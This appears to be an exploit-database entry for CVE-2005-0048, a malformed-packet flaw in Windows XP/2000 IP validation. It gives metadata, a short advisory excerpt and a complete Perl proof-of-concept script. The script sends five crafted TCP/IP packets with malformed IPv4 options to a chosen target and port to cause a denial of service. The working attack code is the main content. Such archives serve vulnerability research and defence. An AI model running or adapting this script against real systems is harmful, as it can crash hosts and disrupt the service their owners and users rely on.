EXPLOITS

Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (1)

Author: Song Liu
type: dos
platform: windows
port: 
date_added: 2005-04-12  
date_updated: 2013-05-12  
verified: 1  
codes: CVE-2005-0048;OSVDB-15463  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 25383.pl  

source: https://www.securityfocus.com/bid/13116/info

Microsoft Windows is reported prone to a remote code execution vulnerability. It is reported that the vulnerability manifests when an affected Microsoft platform receives and processes an especially malformed TCP/IP packet.

Reports indicate that the immediate consequences of exploitation of this issue are a denial of service.

#!/usr/bin/perl
use strict;
use warnings;

my %opts;
use Getopt::Std;
getopts('t:p:', \%opts);
die("Usage: $0 -t TARGET -p PORT\n") unless $opts{t} && $opts{p};

use Net::Pkt;

$Env->debug(3);

my $frame = Net::Packet::Frame->new(
   l3 => Net::Packet::IPv4->new(
      dst     => $opts{t},
      options => "\x03\x27". 'G'x38,
   ),
   l4 => Net::Packet::TCP->new(
      dst => $opts{p},
   ),
);

$frame->send for 1..5;